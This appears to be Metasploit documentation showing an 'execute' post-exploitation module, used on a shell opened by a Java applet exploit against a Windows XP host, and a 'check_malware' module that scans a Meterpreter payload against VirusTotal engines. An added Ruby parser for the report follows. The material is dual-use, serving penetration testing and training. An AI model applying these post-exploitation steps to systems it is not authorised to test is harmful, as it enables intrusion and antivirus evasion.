execute

This module executes an arbitrary command on an open session. Works on Windows, Linux, OSX and Unix platforms.

msf  post(execute) > 
[*] 10.10.0.100      java_jre17_exec - Java 7 Applet Remote Code Execution handling request
[*] Sending stage (2976 bytes) to 10.10.0.100
[*] Command shell session 1 opened (10.10.0.151:4444 -> 10.10.0.100:1173) at 2012-08-31 15:06:06 -0400

msf  post(execute) > show options

Module options (post/multi/general/execute):

   Name     Current Setting       Required  Description
   ----     ---------------       --------  -----------
   COMMAND  echo hell > file.txt  no        The entire command line to execute on the session
   SESSION  1                     yes       The session to run this module on.

msf  post(execute) > run

[*] Executing echo hell > file.txt on #<Session:shell 10.10.0.100:1173 (10.10.0.100) "Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\administrator\Desktop>">...
[*] Response: 
[*] Post module execution completed

msf  post(execute) >  sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\administrator\Desktop> dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 2CB7-2817

 Directory of C:\Documents and Settings\administrator\Desktop

08/31/2012  09:04 AM    <DIR>          .
08/31/2012  09:04 AM    <DIR>          ..
08/31/2012  09:04 AM                46 file.txt
12/29/2011  03:52 PM                70 portlist.txt
               2 File(s)          1,431 bytes
               2 Dir(s)   4,899,721,216 bytes free

C:\Documents and Settings\administrator\Desktop>

malware_check

This module uploads a file to virustotal.com and displays the scan results. It can also be run directly from within a meterpreter session. Works on Windows, Linux, OSX and Unix platforms.

msf post(check_malware) > show options

Module options (post/multi/gather/check_malware):

   Name        Current Setting      Required  Description
   ----        ---------------      --------  -----------
   APIKEY                           yes       VirusTotal API key
   REMOTEFILE  C:\msfrev.exe        yes       A file to check from the remote machine
   SESSION     1                    yes       The session to run this module on.

msf post(check_malware) > run

[*] 192.168.101.129 - Checking: C:\\msfrev.exe...
[*] 192.168.101.129 - VirusTotal message: Scan finished, information embedded
[*] 192.168.101.129 - MD5: 88b90ef2641ed89aa9506264a46df29a
[*] 192.168.101.129 - SHA1: 9767f651321c5cac786312f59a1c046ac1e27ad3
[*] 192.168.101.129 - SHA256: 04fb3ba1ccb64371f75b0b54d1dc7f20dcef2c6f773d7682b3d7f57d4691d296
[*] Analysis Report: C:\msfrev.exe (38 / 55): 

=====================================================================================================================================

 Antivirus             Detected  Version        Result                           Update
 ---------             --------  -------        ------                           ------
 ALYac                 true      1.0.1.5        Gen:Variant.Zusy.Elzob.8031      20151125
 AVG                   true      16.0.0.4460    Agent                            20151125
 AVware                true      1.5.0.21       Trojan.Win32.Swrort.B (v)        20151124
 Ad-Aware              true      12.0.163.0     Gen:Variant.Zusy.Elzob.8031      20151125
 AegisLab              false     1.5                                             20151125
 Agnitum               true      5.5.1.3        Trojan.Rosena.Gen.1              20151124
 AhnLab-V3             true      2015.11.26.00  Trojan/Win32.Shell               20151125
 Alibaba               false     1.0                                             20151125
 Arcabit               true      1.0.0.624      Trojan.Zusy.Elzob.D1F5F          20151125
 Avast                 true      8.0.1489.320   Win32:SwPatch [Wrm]              20151125
 Avira                 true      8.3.2.4        TR/Crypt.EPACK.Gen2              20151125
 Baidu-International   true      3.5.1.41473    Trojan.Win32.Rozena.AM           20151124
 BitDefender           true      7.2            Gen:Variant.Zusy.Elzob.8031      20151125
 Bkav                  false     1.3.0.7383                                      20151125
 ByteHero              false     1.0.0.1                                         20151125
 CAT-QuickHeal         true      14.00          Trojan.Swrort.A                  20151125
 CMC                   false     1.1.0.977                                       20151124
 ClamAV                true      0.98.5.0       Win.Trojan.MSShellcode-7         20151125
 Comodo                true      23654          TrojWare.Win32.Rozena.A          20151125
 Cyren                 true      5.4.16.7       W32/Swrort.A                     20151125
 DrWeb                 true      7.0.16.10090   Trojan.Swrort.1                  20151125
 ESET-NOD32            true      12622          a variant of Win32/Rozena.AM     20151125
 Emsisoft              true      3.5.0.642      Gen:Variant.Zusy.Elzob.8031 (B)  20151125
 F-Prot                true      4.7.1.166      W32/Swrort.A                     20151125
 F-Secure              true      11.0.19100.45  Gen:Variant.Zusy.Elzob.8031      20151125
 Fortinet              true      5.1.220.0      W32/Swrort.C!tr                  20151125
 GData                 true      25             Gen:Variant.Zusy.Elzob.8031      20151125
 Ikarus                true      T3.1.9.5.0     Trojan.Win32.Swrort              20151125
 Jiangmin              false     16.0.100                                        20151124
 K7AntiVirus           true      9.212.17966    Backdoor ( 04c53cce1 )           20151125
 K7GW                  true      9.212.17968    Backdoor ( 04c53cce1 )           20151125
 Kaspersky             true      15.0.1.10      HEUR:Trojan.Win32.Generic        20151125
 Malwarebytes          true      2.1.1.1115     Backdoor.Bot.Gen                 20151125
...snip...

[*] Post module execution completed

meterpreter > run post/multi/gather/check_malware REMOTEFILE=C:\\msfrev.exe

[*] 192.168.101.129 - Checking: C:\Users\loneferret\Downloads\msfrev.exe...
[*] 192.168.101.129 - VirusTotal message: Scan finished, information embedded
[*] 192.168.101.129 - MD5: 88b90ef2641ed89aa9506264a46df29a
[*] 192.168.101.129 - SHA1: 9767f651321c5cac786312f59a1c046ac1e27ad3
[*] 192.168.101.129 - SHA256: 04fb3ba1ccb64371f75b0b54d1dc7f20dcef2c6f773d7682b3d7f57d4691d296
[*] Analysis Report: C:\\msfrev.exe (35 / 54):

=====================================================================================================================================

 Antivirus             Detected  Version        Result                         Update
 ---------             --------  -------        ------                         ------
 ALYac                 true      1.0.1.5        Gen:Variant.Zusy.Elzob.8031    20151125
 AVG                   true      16.0.0.4460    Agent                          20151125
 AVware                true      1.5.0.21       Trojan.Win32.Swrort.B (v)      20151124
 Ad-Aware              true      12.0.163.0     Gen:Variant.Zusy.Elzob.8031    20151125
 AegisLab              false     1.5                                           20151125
 Agnitum               true      5.5.1.3        Trojan.Rosena.Gen.1            20151124
..snip..
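
The report table above is fixed-width, and an engine that did not flag the file leaves its Result cell empty, so splitting rows on whitespace misaligns them. The Ruby below is an added example, not part of the original page or of Metasploit: it parses a saved copy of the module output by column offset and notes when the listing was cut short. The function names and the SAMPLE text (constructed from rows shown above) are assumptions.

```ruby
# Added example, not Metasploit code. SAMPLE is constructed from rows shown above.
SAMPLE = <<~'EOS'
  [*] Analysis Report: C:\msfrev.exe (38 / 55):

   Antivirus             Detected  Version        Result                           Update
   ---------             --------  -------        ------                           ------
   ALYac                 true      1.0.1.5        Gen:Variant.Zusy.Elzob.8031      20151125
   AegisLab              false     1.5                                             20151125
   ClamAV                true      0.98.5.0       Win.Trojan.MSShellcode-7         20151125
   ESET-NOD32            true      12622          a variant of Win32/Rozena.AM     20151125
   K7GW                  true      9.212.17968    Backdoor ( 04c53cce1 )           20151125
  ...snip...
EOS

# Column start offsets come from the dashed rule, so an empty Result cell
# (engine did not flag the file) cannot shift the Update column.
def column_starts(rule)
  starts = []
  rule.scan(/-+/) { starts << Regexp.last_match.begin(0) }
  starts
end

def parse_report(text)
  lines = text.lines.map(&:chomp)
  head = text.match(%r{Analysis Report: (.+?) \((\d+) / (\d+)\)})
  rule_idx = lines.index { |l| l =~ /\A\s*-+(\s+-+)+\s*\z/ }
  raise ArgumentError, 'no report table found' unless head && rule_idx && rule_idx > 0

  starts = column_starts(lines[rule_idx])
  cut = lambda do |line|
    starts.each_with_index.map { |s, i| (line[s...(starts[i + 1] || line.length)] || '').strip }
  end
  keys = cut.call(lines[rule_idx - 1]).map { |k| k.downcase.to_sym }
  rows = lines.drop(rule_idx + 1).take_while { |l| l =~ /\A\s+\S/ }
              .map { |l| keys.zip(cut.call(l)).to_h }
  { file: head[1], detected: head[2].to_i, engines: head[3].to_i, rows: rows }
end

def summarize(report)
  hits, misses = report[:rows].partition { |r| r[:detected] == 'true' }
  labels = hits.each_with_object(Hash.new(0)) { |r, h| h[r[:result]] += 1 }
  { listed: report[:rows].size,
    truncated: report[:rows].size < report[:engines], # "...snip..." hid rows
    missed_by: misses.map { |r| r[:antivirus] },
    labels: labels }
end

p summarize(parse_report(SAMPLE)) if $PROGRAM_NAME == __FILE__
```

The `truncated` flag matters here because the header ratio (38 / 55) covers every engine, while a snipped listing only contains some of them.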